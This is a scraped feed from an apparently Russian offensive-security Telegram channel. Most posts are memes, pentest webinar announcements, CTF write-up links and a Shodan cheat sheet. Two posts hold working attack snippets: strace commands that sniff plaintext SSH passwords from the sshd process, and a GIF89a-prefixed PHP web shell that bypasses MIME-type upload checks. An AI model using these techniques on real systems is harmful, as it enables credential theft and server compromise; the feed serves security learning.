RESOLUTE ATTACK
6.45K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🤨Команда девелоперов
RESOLUTE ATTACK

Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣356👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

Ну или одной строкой

strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture


#ssh #sniff #password
18🔥94👍4
😈Scraping директорий на Python

Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.

Читать

#Python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥176👍5
До 9к добъём?
👍34🔥12
🗣Обход загрузки файлов с использованием MIME-типа

Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.

Для этого нам нужно добавить только одну строку в начале нашего скрипта: GIF89a;

GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.

GIF89a;
<?php
system('whoami'); # shellcode goes here
?>

RESOLUTE ATTACK

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6😍3🤣3
⚡️ Пентест 1С-БИТРИКС
Завтра в 20:00 (мск)

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥1063
🔄В начале декабря Google релизнули свои машинки формата CTF. Проект получил название H4CK1NG. Стильный интерфейс, нетривиальные решения, все это - бесплатно. Делитесь в чате своими успехами в прохождении задачек, я тоже пойду порешаю ^_^
h4ck1ng.google

E1TEX|RESOLUTE ATTACK

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👨‍💻9👍642
⚡️ Пентест 1С-БИТРИКС
УЖЕ ЧЕРЕЗ ОДИН ЧАС

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥157👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26🤩6😍5👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥31👍84
👁‍🗨WriteUpTHM - Marketplace

Продолжаем серию WriteUp’ов
Системный администратор The Marketplace, Майкл, предоставил вам доступ к своему внутреннему серверу, чтобы вы могли протестировать платформу Marketplace, над которой он и его команда работали.

Читать

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1610👨‍💻32👍2
searching-shodan-for-fun-and-profit.pdf
1.5 MB
Searching Shodan For Fun And Profit
(Shodan Cheat Sheet)

Расширенное руководство по Shodan на русском языке: https://t.me/RESOLUTEATTACK/368

#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
207🔥2🤩2
Интересно ли посмотрит необычные отчёты с HackerOne?
Anonymous Poll
96%
Да
4%
Нет
👍103🔥32